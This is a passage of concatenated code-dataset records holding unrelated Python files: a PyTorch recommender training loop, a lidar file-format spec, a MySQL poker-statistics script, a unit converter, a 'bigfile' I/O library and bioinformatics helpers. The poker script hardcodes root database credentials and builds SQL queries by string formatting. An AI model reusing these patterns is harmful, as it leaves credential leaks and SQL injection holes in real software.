nn.Embedding(fa2_size, args.feature_dim, padding_idx=0, sparse=False)\nembed_layer_fs1 = nn.Embedding(fs1_size, args.feature_dim, padding_idx=0, sparse=False)\nembed_layer_fs2 = nn.Embedding(fs2_size, args.feature_dim, padding_idx=0, sparse=False)\nembed_layer_fn1 = nn.Embedding(fn1_size, args.feature_dim, padding_idx=0, sparse=False)\nembed_layer_fn2 = nn.Embedding(fn2_size, args.feature_dim, padding_idx=0, sparse=False)\nembed_layer_fr1 = nn.Embedding(fr1_size, args.feature_dim, padding_idx=0, sparse=False)\nembed_layer_fr2 = nn.Embedding(fr2_size, args.feature_dim, padding_idx=0, sparse=False)\nembed_layer_fi1 = nn.Embedding(fi1_size, args.feature_dim, padding_idx=0, sparse=False)\n\nmodel = Recommend(embed_layer_word, embed_layer_fa1, embed_layer_fa2, embed_layer_fs1, embed_layer_fs2, embed_layer_fn1, embed_layer_fn2, embed_layer_fr1, embed_layer_fr2, embed_layer_fi1, **parameters)\ncriterion = nn.CrossEntropyLoss().to(device)\nmodel = model.to(device)\noptimizer = torch.optim.RMSprop(model.parameters(), args.lr_rate, weight_decay=0.9)\n\nbest_dev = np.inf\nnum_epochs = args.num_epochs\nstart_epoch = 0\nepoch_examples_total = len(train_dataset)\nprint('train batches', epoch_examples_total)\n\nfor epoch in range(num_epochs):\n time_epoch_start = time.time()\n model.train(True)\n epoch_loss = 0\n for batch_idx, (batch_txts, batch_lens, batch_fa1s, batch_fa2s, batch_fs1s, batch_fs2s, batch_fn1s, batch_fn2s, batch_fr1s, batch_fr2s, batch_fi1s, batch_tgt, batch_ids, _) 
in enumerate(train_loader):\n\n batch_txts =batch_txts.to(device)\n\n batch_fa1s = batch_fa1s.to(device)\n batch_fa2s = batch_fa2s.to(device)\n batch_fs1s = batch_fs1s.to(device)\n batch_fs2s = batch_fs2s.to(device)\n batch_fn1s = batch_fn1s.to(device)\n batch_fn2s = batch_fn2s.to(device)\n batch_fr1s = batch_fr1s.to(device)\n batch_fr2s = batch_fr2s.to(device)\n batch_fi1s = batch_fi1s.to(device)\n batch_tgt = batch_tgt.to(device)\n\n prob = model(batch_txts, batch_lens, batch_fa1s, batch_fa2s, batch_fs1s, batch_fs2s, batch_fn1s, batch_fn2s, batch_fr1s, batch_fr2s, batch_fi1s)\n batch_loss = criterion(prob, batch_tgt)\n\n optimizer.zero_grad()\n batch_loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), 5)\n epoch_loss += batch_loss.item() * batch_txts.size(0)\n loss = batch_loss.item()\n optimizer.step()\n\n sys.stdout.write(\n '%d batches processed. current batch loss: %f\\r' %\n (batch_idx, loss)\n )\n sys.stdout.flush()\n\n epoch_loss_avg = epoch_loss / float(epoch_examples_total)\n print('Epoch: ', epoch, 'Train Loss: ', epoch_loss_avg)\n \n aspect_all_ys = []\n aspect_all_ys_ = []\n aspect_ids = []\n\n dev_loss = 0\n model.eval()\n for batch_idx, (batch_txts, batch_lens, batch_fa1s, batch_fa2s, batch_fs1s, batch_fs2s, batch_fn1s, batch_fn2s, batch_fr1s, batch_fr2s, batch_fi1s, batch_tgt, batch_ids, _) in enumerate(val_loader):\n batch_txts =batch_txts.to(device)\n\n batch_fa1s = batch_fa1s.to(device)\n batch_fa2s = batch_fa2s.to(device)\n batch_fs1s = batch_fs1s.to(device)\n batch_fs2s = batch_fs2s.to(device)\n batch_fn1s = batch_fn1s.to(device)\n batch_fn2s = batch_fn2s.to(device)\n batch_fr1s = batch_fr1s.to(device)\n batch_fr2s = batch_fr2s.to(device)\n batch_fi1s = batch_fi1s.to(device)\n batch_tgt = batch_tgt.to(device)\n\n prob = model(batch_txts, batch_lens, batch_fa1s, batch_fa2s, batch_fs1s, batch_fs2s, batch_fn1s, batch_fn2s, batch_fr1s, batch_fr2s, batch_fi1s)\n batch_loss = criterion(prob, batch_tgt)\n\n dev_loss += batch_loss.item() * batch_txts.size(0)\n loss = batch_loss.item()\n sys.stdout.flush()\n\n symbols = prob.topk(1)[1].squeeze(1)\n aspect_all_ys_.extend(symbols.tolist())\n aspect_all_ys.extend(batch_tgt.tolist())\n aspect_ids.extend(batch_ids)\n dev_loss = accuracy_score(aspect_all_ys, aspect_all_ys_)\n\n epoch_loss_avg = dev_loss / float(epoch_examples_total)\n print('Epoch: ', epoch, 'Valid Loss: ', epoch_loss_avg)\n if dev_loss < best_dev:\n best_dev = dev_loss\n state = {\n 'epoch': start_epoch + epoch + 1,\n 'model': model.state_dict(),\n 'best_prec1': best_dev\n }\n torch.save(state, os.path.join(model_dir,'best_dev_model.pth.tar'))\nstate = torch.load(os.path.join(model_dir,'best_dev_model.pth.tar'))\nstate_dict = state['model']\nmodel.load_state_dict(state_dict)\n\naspect_all_ys = []\naspect_all_ys_ = []\naspect_all_ys_avg = []\naspect_ids = []\nfor batch_idx, (batch_txts, batch_lens, batch_fa1s, batch_fa2s, batch_fs1s, batch_fs2s, batch_fn1s, batch_fn2s, batch_fr1s, batch_fr2s, batch_fi1s, batch_tgt, batch_ids, batch_avg) in enumerate(test_loader):\n\n batch_txts =batch_txts.to(device)\n\n batch_fa1s = batch_fa1s.to(device)\n batch_fa2s = batch_fa2s.to(device)\n batch_fs1s = batch_fs1s.to(device)\n batch_fs2s = batch_fs2s.to(device)\n batch_fn1s = batch_fn1s.to(device)\n batch_fn2s = batch_fn2s.to(device)\n batch_fr1s = batch_fr1s.to(device)\n batch_fr2s = batch_fr2s.to(device)\n batch_fi1s = batch_fi1s.to(device)\n batch_tgt = batch_tgt.to(device)\n prob = model(batch_txts, batch_lens, batch_fa1s, batch_fa2s, batch_fs1s, batch_fs2s, 
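# nine side-feature tensors, matching the nine feature nn.Embedding layers defined above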
batch_fn1s, batch_fn2s, batch_fr1s, batch_fr2s, batch_fi1s)\n symbols = prob.topk(1)[1].squeeze(1)\n aspect_all_ys_.extend(symbols.tolist())\n aspect_all_ys.extend(batch_tgt.tolist())\n aspect_all_ys_avg.extend(batch_avg)\n aspect_ids.extend(batch_ids)\nr = accuracy_score(aspect_all_ys, aspect_all_ys_)\nm = mean_squared_error(aspect_all_ys, aspect_all_ys_)\nprint()\nprint('\\t accuracy %.4f' % (r))\nprint('\\t mse %.4f' % (m))\ndecision_accuracy = 0\nfor ys_, ys in zip(aspect_all_ys_, aspect_all_ys_avg):\n if (ys_+1 > 3 and ys > 3.5) or (ys_+1 <= 3 and ys <= 3.5):\n decision_accuracy += 1\nprint('\\t decision accuracy', decision_accuracy/len(aspect_all_ys_))\nprint(aspect_all_ys, aspect_all_ys_, aspect_all_ys_avg)","sub_path":"Score Prediction/recommend.py","file_name":"recommend.py","file_ext":"py","file_size_in_byte":11966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"431418651","text":"'''\n.mpl file format for SigmaMPL2015R2.3 Manual, Data file version 5\n'''\n# import\nimport numpy as np\n\n\n# supp function\ndef size2eind_func(bytesizedic):\n '''\n converts bytesizedic to byteinddic. end index of each data key\n '''\n vals, keys = list(bytesizedic.values()), list(bytesizedic.keys())\n vals = np.cumsum(vals)\n return dict(zip(keys, vals))\n\ndef size2sind_func(sinddic):\n '''\n converts bytesizedic to byteinddic. start index of each data key\n '''\n vals, keys = list(sinddic.values()), list(sinddic.keys())\n vals.pop()\n vals.insert(0, 0)\n return dict(zip(keys, vals))\n\n\n# defining data\ntime_keylst = [\n 'year', # to be handled seperately this does not follow\n 'month', # exactly with the manual it is accomodated for\n 'day', # pandas\n 'hour', #\n 'minute', #\n 'second', #\n]\nchannel_keylst = [\n 'Channel #1 Data',\n 'Channel #2 Data',\n]\nwanted_keylst = [\n # 'Unit Number',\n # 'Version Format',\n 'year', # to be handled seperately, this does not follow\n 'month', # exactly with the manual, it is accomodated for\n 'day', # pandas\n 'hour', #\n 'minute', #\n 'second', #\n 'Shots Sum',\n 'Trigger Frequency', # for performance check\n 'Energy Monitor', # [nJ]\n 'Temp #0', # Detector Temperature\n 'Temp #1', # unknown\n 'Temp #2', # Telescope Temperature\n 'Temp #3', # Laser temperature\n 'Temp #4', # unknown\n 'Background Average',\n 'Background Std Dev',\n # 'Number Channels', # assumed to always be 2\n 'Number Bins',\n 'Bin Time', # half the bin size in temporal\n 'Range Calibration', # mainly zero, check for every new unit\n 'Number Data Bins',\n 'Scan Scenario Flag', # check angle and remove\n 'Number of Background Bins',\n 'Azimuth Angle',\n 'Elevation Angle',\n # 'Compass Degrees',\n # 'Lidar Site',\n # 'Wavelength',\n # 'GPS Latitude',\n # 'GPS Longitude',\n # 'GPS Altitude',\n 'A/D Data Bad flag', # for performance check, 0 is good, 1 is bad\n # 'DataFileVersion', # version 5\n 'Background Average 2',\n 'Background Std Dev 2',\n 'McsMode',\n 'First data bin', # noted to be zero, might be redundant\n 'System Type',\n 'Sync Pulses Seen Per Second', # for performance, this values changes\n 'First Background Bin',\n # 'Header Size', # static 163,size of data before the channels\n 'Weather Station Used',\n 'Weather Station: Inside Temperature',\n 'Weather Station: Outside Temperature',\n 'Weather Station: Inside Humidity',\n 'Weather Station: Outside Humidity',\n 'Weather Station: Dew Point',\n 'Weather Station: Wind Speed',\n 'Weather Station: Wind Direction',\n 'Weather Station: Barometric Pressure',\n 'Weather 
Station: Rain Rate',\n 'Channel #1 Data', # [MHz]\n 'Channel #2 Data', # [MHz]\n]\ndtype_dic = {\n 'Unit Number':np.uint16,\n 'Version Format':np.uint16,\n 'year':np.uint16,\n 'month':np.uint16,\n 'day':np.uint16,\n 'hour':np.uint16,\n 'minute':np.uint16,\n 'second':np.uint16,\n 'Shots Sum':np.uint32,\n 'Trigger Frequency':np.int32,\n 'Energy Monitor':np.uint32,\n 'Temp #0':np.uint32,\n 'Temp #1':np.uint32,\n 'Temp #2':np.uint32,\n 'Temp #3':np.uint32,\n 'Temp #4':np.uint32,\n 'Background Average':np.float32,\n 'Background Std Dev':np.float32,\n 'Number Channels':np.uint16,\n 'Number Bins':np.uint32,\n 'Bin Time':np.float32,\n 'Range Calibration':np.float32,\n 'Number Data Bins':np.uint16,\n 'Scan Scenario Flag':np.uint16,\n 'Number of Background Bins':np.uint16,\n 'Azimuth Angle':np.float32,\n 'Elevation Angle':np.float32,\n 'Compass Degrees':np.float32,\n 'Lidar Site':np.char, # this is not correct\n 'Wavelength':np.uint16,\n 'GPS Latitude':np.float32,\n 'GPS Longitude':np.float32,\n 'GPS Altitude':np.float32,\n 'A/D Data Bad flag':np.int8,\n 'DataFileVersion':np.int8,\n 'Background Average 2':np.float32,\n 'Background Std Dev 2':np.float32,\n 'McsMode':np.int8,\n 'First data bin':np.uint16,\n 'System Type':np.int8,\n 'Sync Pulses Seen Per Second':np.uint16,\n 'First Background Bin':np.uint16,\n 'Header Size':np.uint16,\n 'Weather Station Used':np.int8,\n 'Weather Station: Inside Temperature':np.float32,\n 'Weather Station: Outside Temperature':np.float32,\n 'Weather Station: Inside Humidity':np.float32,\n 'Weather Station: Outside Humidity':np.float32,\n 'Weather Station: Dew Point':np.float32,\n 'Weather Station: Wind Speed':np.float32,\n 'Weather Station: Wind Direction':np.int16,\n 'Weather Station: Barometric Pressure':np.float32,\n 'Weather Station: Rain Rate':np.float32,\n 'Channel #1 Data':np.float32,\n 'Channel #2 Data':np.float32,\n}\n## config dependent\nbytesize_dic = {\n 'Unit Number':2,\n 'Version Format':2,\n 'year':2,\n 'month':2,\n 'day':2,\n 'hour':2,\n 'minute':2,\n 'second':2,\n 'Shots Sum':4,\n 'Trigger Frequency':4,\n 'Energy Monitor':4,\n 'Temp #0':4,\n 'Temp #1':4,\n 'Temp #2':4,\n 'Temp #3':4,\n 'Temp #4':4,\n 'Background Average':4,\n 'Background Std Dev':4,\n 'Number Channels':2,\n 'Number Bins':4,\n 'Bin Time':4,\n 'Range Calibration':4,\n 'Number Data Bins':2,\n 'Scan Scenario Flag':2,\n 'Number of Background Bins':2,\n 'Azimuth Angle':4,\n 'Elevation Angle':4,\n 'Compass Degrees':4,\n 'Lidar Site':6,\n 'Wavelength':2,\n 'GPS Latitude':4,\n 'GPS Longitude':4,\n 'GPS Altitude':4,\n 'A/D Data Bad flag':1,\n 'DataFileVersion':1,\n 'Background Average 2':4,\n 'Background Std Dev 2':4,\n 'McsMode':1,\n 'First data bin':2,\n 'System Type':1,\n 'Sync Pulses Seen Per Second':2,\n 'First Background Bin':2,\n 'Header Size':2,\n 'Weather Station Used':1,\n 'Weather Station: Inside Temperature':4,\n 'Weather Station: Outside Temperature':4,\n 'Weather Station: Inside Humidity':4,\n 'Weather Station: Outside Humidity':4,\n 'Weather Station: Dew Point':4,\n 'Weather Station: Wind Speed':4,\n 'Weather Station: Wind Direction':2,\n 'Weather Station: Barometric Pressure':4,\n 'Weather Station: Rain Rate':4,\n 'Channel #1 Data':0, # to be filled in by reader\n 'Channel #2 Data':0 # 1000 -> 30m binsize, 2000 -> 15m binsize\n}\n\n\nbyteeind_dic = size2eind_func(bytesize_dic)\nbytesind_dic = size2sind_func(byteeind_dic)\n\n\n# for import\nimport_dic = {\n 'time_key':'Timestamp',\n 'range_key':'Range',\n 'mask_key':'Channel Data Mask',\n 'pad_key':'Pad',\n 'headersize':163,\n 
'bintimefactor':0.5,\n 'energyfactor':1e-3,\n 'channelbytenum':4,\n\n 'time_keylst':time_keylst,\n 'channel_keylst':channel_keylst,\n 'wanted_keylst':wanted_keylst,\n\n 'dtype_dic':dtype_dic,\n 'bytesize_dic':bytesize_dic,\n 'bytesind_dic':bytesind_dic,\n 'byteeind_dic':byteeind_dic,\n}\n\n# testing\nif __name__ == '__main__':\n print(byteeind_dic)\n","sub_path":"mpl_reader/smmpl_fmt.py","file_name":"smmpl_fmt.py","file_ext":"py","file_size_in_byte":7264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"207809900","text":"import pymysql\r\nimport pandas as pd\r\nimport json\r\nfrom collections import defaultdict\r\n\r\ndef main():\r\n names = [\"TEST_NUDT_IA\", \"TEST_NUDT_THU\", \"TEST_IA_THU\", \"TEST_NUDT_ICT\", \"Test_IA_ICT\", \"TEST_THU_ICT\"]\r\n for name in names:\r\n Mysql().lookup(name, False)\r\n # name = \"NewStack_MoreAction vs nudt\"\r\n # name = \"Hit_6p_test\"\r\n # name = \"NewStack_argmax vs nudt\"\r\n # Mysql().lookup(name) \r\n # name = \"Test6p\"\r\n # Mysql().lookup(name)\r\n # Mysql().battle_history(name)\r\n # Mysql().user_battle_history(\"FengYan\", \"OpenStack\")\r\n\r\nclass Mysql:\r\n\r\n def __init__(self):\r\n self.content = pymysql.Connect(\r\n host=\"172.18.40.65\", # MySQL host IP\r\n port=3306, # port\r\n user=\"root\", # username\r\n passwd=\"root\", # database password\r\n db=\"poker\", # database name\r\n charset='utf8', # character set\r\n )\r\n self.cursor = self.content.cursor()\r\n\r\n def lookup(self, battle_name, save_file=True):\r\n game_sql = 'select bot_list from batch_ai_validate where batch_name like \"{}%\"'.format(battle_name)\r\n self.cursor.execute(game_sql)\r\n result = self.cursor.fetchall()\r\n bots = result[0][0].split(',')\r\n\r\n table = pd.DataFrame(columns=['AI名字', '总局数', '累积收益筹码', '场均收益筹码', '0.95置信区间'])\r\n\r\n for bot in bots:\r\n game_sql = (\r\n 'SELECT count(*) AS 总局数, sum( win_money ) AS 总赢钱, Round( sum( win_money ) / count(*) , 2 ) AS \"mbb/h\", Round( STD( win_money ) * 10, 2 ) AS 标准差, '\r\n 'Round( 1.96 * STD( win_money )/ POWER( count(*), 1 / 2 ) , 2 ) AS \"0.95置信区间范围\" FROM player ' \r\n 'WHERE room_id IN (select room_id from validate_room_mapping where batch_name like \"{}%\") and name = \"{}\"'\r\n ).format(battle_name, bot)\r\n self.cursor.execute(game_sql)\r\n self.cursor.connection.commit()\r\n result = self.cursor.fetchall()[0]\r\n table.loc[table.shape[0]] = [bot, result[0], result[1], result[2], result[4]]\r\n print(table)\r\n\r\n if save_file:\r\n writer = pd.ExcelWriter('../docs/record/{}_stat.xlsx'.format(battle_name)) \r\n table.to_excel(writer,float_format='%.5f')\r\n writer.save()\r\n\r\n def transpose(self, action_history):\r\n def f(x):\r\n if x == \"call\":\r\n return \"c\"\r\n if x == \"check\":\r\n return \"c\"\r\n if x == \"fold\":\r\n return \"f\"\r\n return x\r\n game_all = []\r\n for one_round in action_history:\r\n round_all = []\r\n for one_action in one_round:\r\n action = str(one_action[\"position\"]) + \":\" + f(str(one_action[\"action\"]))\r\n round_all.append(action)\r\n round_all = ','.join(round_all)\r\n game_all.append(round_all)\r\n game_all = '/'.join(game_all)\r\n return game_all\r\n\r\n def battle_history(self, battle_name, save_file=True):\r\n history = {}\r\n game_sql = 'SELECT * FROM game WHERE room_id IN (select room_id from validate_room_mapping where batch_name like \"{}%\")'.format(battle_name)\r\n self.cursor.execute(game_sql)\r\n result = self.cursor.fetchall()\r\n for row in result:\r\n game_id, public_card, action_history, battle_time, room_id = row[:5]\r\n 
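# one history entry per game, keyed by game_id; a second query below attaches the player details\r\n 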
history[game_id] = dict(\r\n public_card=public_card, \r\n action_history=self.transpose(json.loads(action_history)),\r\n battle_time=battle_time.strftime('%Y-%m-%d %H:%M:%S' ),\r\n players={}\r\n )\r\n \r\n game_sql = 'SELECT game_id, position, win_money, private_card, name FROM player WHERE (room_id IN (select room_id from validate_room_mapping where batch_name like \"{}%\") or (room_id >= 800000 and room_id <= 800100))'.format(battle_name)\r\n self.cursor.execute(game_sql)\r\n result = self.cursor.fetchall()\r\n for row in result:\r\n game_id, position, win_money, private_card, name = row[:]\r\n history[game_id][\"players\"][int(position)] = dict(\r\n win_money=float(win_money),\r\n private_card=private_card,\r\n name=name \r\n )\r\n if save_file:\r\n with open(\"../docs/record/{}_history.json\".format(battle_name), \"w\") as f:\r\n json.dump(history, f, indent=4, ensure_ascii=False)\r\n\r\n def user_battle_history(self, user_name, bot_name, save_file=True):\r\n history = {}\r\n game_sql = 'SELECT * FROM game WHERE room_id IN (SELECT room_id FROM room WHERE create_user_name = \"{}\" AND boot_list = \"{}\" ) Order By time'.format(user_name, bot_name)\r\n self.cursor.execute(game_sql)\r\n result = self.cursor.fetchall()\r\n for row in result:\r\n game_id, public_card, action_history, battle_time, room_id = row[:5]\r\n history[game_id] = dict(\r\n public_card=public_card, \r\n action_history=self.transpose(json.loads(action_history)),\r\n battle_time=battle_time.strftime('%Y-%m-%d %H:%M:%S' ),\r\n players={}\r\n )\r\n\r\n game_sql = 'SELECT game_id, position, win_money, private_card, name FROM player WHERE room_id IN (SELECT room_id FROM room WHERE create_user_name = \"{}\" AND boot_list = \"{}\" )'.format(user_name, bot_name)\r\n self.cursor.execute(game_sql)\r\n result = self.cursor.fetchall()\r\n for row in result:\r\n game_id, position, win_money, private_card, name = row[:]\r\n history[game_id][\"players\"][int(position)] = dict(\r\n win_money=float(win_money),\r\n private_card=private_card,\r\n name=name \r\n )\r\n error_game_id = []\r\n for game_id, value in history.items():\r\n if value[\"players\"][0][\"name\"] != bot_name and value[\"players\"][1][\"name\"] != bot_name:\r\n error_game_id.append(game_id)\r\n for game_id in error_game_id:\r\n del history[game_id]\r\n if save_file:\r\n with open(\"../docs/record/{}_{}_history.json\".format(user_name, bot_name), \"w\") as f:\r\n json.dump(history, f, indent=4, ensure_ascii=False)\r\n\r\n table = pd.DataFrame(columns=['玩家名', '玩家位置', '玩家手牌', 'OpenStack手牌', '公共牌', '玩家获胜筹码', '动作序列', '对打时间'])\r\n\r\n count, total = 0, 0\r\n for game_id, value in history.items():\r\n line = []\r\n line.append(user_name)\r\n if value[\"players\"][0][\"name\"] == bot_name:\r\n position = 1\r\n else:\r\n position = 0\r\n line.append(position)\r\n line.append(value[\"players\"][position][\"private_card\"])\r\n line.append(value[\"players\"][1 - position][\"private_card\"])\r\n line.append(value[\"public_card\"])\r\n line.append(value[\"players\"][position][\"win_money\"])\r\n line.append(value[\"action_history\"])\r\n line.append(value[\"battle_time\"])\r\n table.loc[table.shape[0]] = line\r\n count += 1\r\n total += value[\"players\"][position][\"win_money\"]\r\n writer = pd.ExcelWriter('../docs/record/{}_{}_stat.xlsx'.format(user_name, bot_name)) \r\n table.to_excel(writer,float_format='%.5f')\r\n writer.save()\r\n print(count, total, total / count)\r\n\r\nif __name__ == \"__main__\":\r\n 
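# entry point: print win-rate tables for each configured test battle\r\n 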
main()\r\n","sub_path":"scripts/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":7601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"112907694","text":"fahrenheitMeltDegrees = 32.0\r\nfahrenheitBoilDegrees = 212.0\r\n\r\ncelsiusMeltDegrees = 0.0\r\ncelsiusBoilDegrees = 100.0\r\n\r\n# a)\r\ncelsiusConvert = float(input(\"Convert Celsius to Fahrenheit: \"))\r\ncelsiusResult = celsiusConvert * 1.8 + fahrenheitMeltDegrees\r\nprint(\"Celsius degrees converted to Fahrenheit: \" + str(round(celsiusResult, 2)))\r\n\r\nprint()\r\n\r\n# b)\r\nfahrenheitConvert = float(input(\"Convert Fahrenheit to Celsius: \"))\r\nfahrenheitResult = (fahrenheitConvert - fahrenheitMeltDegrees) / 1.8\r\nprint(\"Fahrenheit degrees converted to Celsius: \" + str(round(fahrenheitResult, 2)))","sub_path":"rudi_rutanen-python_harjoitus-2.py","file_name":"rudi_rutanen-python_harjoitus-2.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"31727812","text":"from .version import __version__\n\nfrom .pyxbigfile import BigFileError, BigFileClosedError, BigBlockClosedError\nfrom .pyxbigfile import BigBlock as BigBlockBase\nfrom .pyxbigfile import BigFile as BigFileLowLevel\nfrom .pyxbigfile import set_buffer_size\nfrom . import bigfilempi\n\nimport os\nimport numpy\n\ntry:\n basestring # attempt to evaluate basestring\n def isstr(s):\n return isinstance(s, basestring)\nexcept NameError:\n def isstr(s):\n return isinstance(s, str)\n\ndef isstrlist(s):\n if not isinstance(s, list):\n return False\n return all([ isstr(ss) for ss in s])\n\nclass BigBlock(BigBlockBase):\n def flush(self):\n self._flush()\n def close(self):\n self._close()\n\nclass BigFileBase(BigFileLowLevel):\n def __init__(self, filename, create=False):\n BigFileLowLevel.__init__(self, filename, create)\n self.blocks = []\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, tb):\n self.close()\n\n def __contains__(self, key):\n return key in self.blocks\n\n def __iter__(self):\n return iter(self.blocks)\n\n def __getitem__(self, key):\n if key.endswith('/'):\n return self.subfile(key)\n\n return self.open(key)\n\n\nclass BigFile(BigFileBase):\n\n def __init__(self, filename, create=False):\n BigFileBase.__init__(self, filename, create)\n self.refresh()\n\n def open(self, blockname):\n block = BigBlock()\n block.open(self, blockname)\n return block\n\n def create(self, blockname, dtype=None, size=None, Nfile=1):\n block = BigBlock()\n block.create(self, blockname, dtype, size, Nfile)\n self.refresh()\n return block\n\n def subfile(self, key):\n return BigFile(os.path.join(self.basename, key))\n\n def refresh(self):\n \"\"\" Refresh the list of blocks to the disk.\"\"\"\n self.blocks = self.list_blocks()\n\nclass BigBlockMPI(BigBlock):\n def __init__(self, comm):\n self.comm = comm\n BigBlock.__init__(self)\n\n def create(self, f, blockname, dtype=None, size=None, Nfile=1):\n if self.comm.rank == 0:\n super(BigBlockMPI, self).create(f, blockname, dtype, size, Nfile)\n super(BigBlockMPI, self).close()\n self.comm.barrier()\n self.open(f, blockname)\n\n def close(self):\n self._MPI_close()\n\n def flush(self):\n self._MPI_flush()\n\nclass BigFileMPI(BigFileBase):\n\n def __init__(self, comm, filename, create=False):\n self.comm = comm\n if self.comm.rank == 0:\n BigFileBase.__init__(self, filename, create)\n self.comm.barrier()\n if self.comm.rank != 0:\n 
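# non-root ranks wait on the barrier until rank 0 has created the file, then open it without create\n 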
self.comm.barrier()\n BigFileBase.__init__(self, filename, create=False)\n self.refresh()\n\n def refresh(self):\n \"\"\" Refresh the list of blocks to the disk, collectively \"\"\"\n if self.comm.rank == 0:\n self.blocks = self.list_blocks()\n else:\n self.blocks = None\n self.blocks = self.comm.bcast(self.blocks)\n\n def open(self, blockname):\n block = BigBlockMPI(self.comm)\n block.open(self, blockname)\n return block\n\n def subfile(self, key):\n return BigFileMPI(self.comm, os.path.join(self.basename, key))\n\n def create(self, blockname, dtype=None, size=None, Nfile=1):\n block = BigBlockMPI(self.comm)\n block.create(self, blockname, dtype, size, Nfile)\n self.refresh()\n return block\n\n def create_from_array(self, blockname, array, Nfile=1):\n size = self.comm.allreduce(len(array))\n offset = sum(self.comm.allgather(len(array))[:self.comm.rank])\n dtype = numpy.dtype((array.dtype, array.shape[1:]))\n with self.create(blockname, dtype, size, Nfile) as b:\n b.write(offset, array)\n return self.open(blockname)\n\nclass BigData:\n \"\"\" Accessing read-only subset of blocks from a bigfile.\n \n Parameters\n ----------\n file : BigFile\n\n blocks : list or None\n a list of blocks to use. If None is given, all blocks are used.\n\n \"\"\"\n def __init__(self, file, blocks=None):\n if blocks is None:\n blocks = file.blocks\n\n self.blocknames = blocks\n self.blocks = dict([\n (block, file[block]) for block in self.blocknames])\n\n self.file = file\n dtype = []\n size = None\n for block in self.blocknames:\n bb = self.blocks[block]\n dtype.append((block, bb.dtype))\n if size is None: size = bb.size\n elif bb.size != size:\n raise BigFileError('Dataset length is inconsistent on %s' %block)\n\n self.size = size\n self.dtype = numpy.dtype(dtype)\n self.ndim = 1\n self.shape = (size, )\n\n def __getitem__(self, sl):\n if isinstance(sl, tuple):\n if len(sl) == 2:\n if isstr(sl[1]) or isstrlist(sl[1]):\n # sl[0] shall be column name\n sl = (sl[1], sl[0])\n col, sl = sl\n return self[col][sl]\n if len(sl) == 1:\n # Python 3? 
(a,) is sent in.\n return self[sl[0]]\n\n if isinstance(sl, slice):\n start, end, stop = sl.indices(self.size)\n assert stop == 1\n result = numpy.empty(end - start, dtype=self.dtype)\n for block in self.blocknames:\n result[block][:] = self.blocks[block][sl]\n return result\n elif sl is Ellipsis:\n return self[:]\n elif isstr(sl):\n return self.blocks[sl]\n elif isstrlist(sl):\n assert all([(col in self.blocks) for col in sl])\n return BigData(self.file, sl)\n elif numpy.isscalar(sl):\n sl = slice(sl, sl + 1)\n return self[sl][0]\n else:\n raise TypeError('Expecting a slice or a scalar, got a `%s`' %\n str(type(sl)))\n\n\nfrom numpy.testing import Tester\ntest = Tester().test\nbench = Tester().bench\n","sub_path":"bigfile/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"398404948","text":"def createCouple(aa):\n couples=[]\n for x in range(len(aa)):\n for i in range (len(aa)):\n c=aa[x]+aa[i]\n if c[::-1] not in couples:\n couples.append(c)\n return couples\n\ndef collectScores(matrix,aminoacid):\n lines=[]\n for line in matrix:\n line=line.rstrip()\n line=line.split()\n lines.append(line)\n x=20\n scores=[]\n for n in range(len(aminoacid)):\n columns=[]\n for j in range(x):\n columns.append(lines[j][n])\n x-=1\n scores.extend(columns)\n del lines[0]\n return scores\n\ndef createDictionary(matrix,aminoacid):\n coupleList=createCouple(aminoacid)\n scores=collectScores(matrix,aminoacid)\n dictionary={}\n i=0\n for couple in coupleList:\n dictionary[couple]=scores[i]\n i+=1\n print (\"VV\",dictionary['VV'])\n return dictionary\n\nmatrix=open(\"./PAM250.txt\",\"r\")\naminoacid=\"ARNDCQEGHILKMFPSTWYV\"\ncreateDictionary(matrix,aminoacid)\n","sub_path":"data/exercises/simmetric_matrix.py","file_name":"simmetric_matrix.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"53943270","text":"#-*- coding: UTF-8 -*-\nfrom __future__ import division, print_function, absolute_import, unicode_literals\n\nimport numpy as np\nimport data_io_cognition as io\nimport cost_time as ct\nimport fits_cognition as fits\nfrom fits_cognition import Fitter\nimport utils\nimport matplotlib as mt\nfrom matplotlib import pyplot as plt\nfrom matplotlib import colors as mt_colors\nimport matplotlib.gridspec as gridspec\nimport os, re, pickle, warnings, json, logging, copy, scipy.integrate, itertools, ete3, sys\nfrom sklearn import cluster\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy import stats\ntry:\n\tfrom diptest.diptest import dip\nexcept:\n\tfrom utils import dip\n\ndef default_tree_layout(node):\n\t\"\"\"\n\tdefault_tree_layout(node)\n\t\n\tTakes an ete3.TreeNode instance and sets its default style adding the\n\tappropriate TextFaces\n\t\n\t\"\"\"\n\tstyle = ete3.NodeStyle(vt_line_width=3,hz_line_width=3,size=0)\n\tif node.is_leaf():\n\t\tportions = node.name.split('_')\n\t\texperiment = None\n\t\tsubject = None\n\t\tsession = None\n\t\tname_alias = []\n\t\tif not portions[0] in ['subj','ses']:\n\t\t\tstart_ind = 1\n\t\t\texperiment = portions[0]\n\t\telse:\n\t\t\tstart_ind = 0\n\t\tfor key,val in zip(portions[start_ind::2],portions[start_ind+1::2]):\n\t\t\tif key=='subj':\n\t\t\t\tsubject = val\n\t\t\telif key=='ses':\n\t\t\t\tsession = val\n\t\tif not experiment is None:\n\t\t\tbgcolor = {'2AFC':'#FF0000','Auditivo':'#008000','Luminancia':'#0000FF'}[experiment]\n\t\t\tfgcolor = 
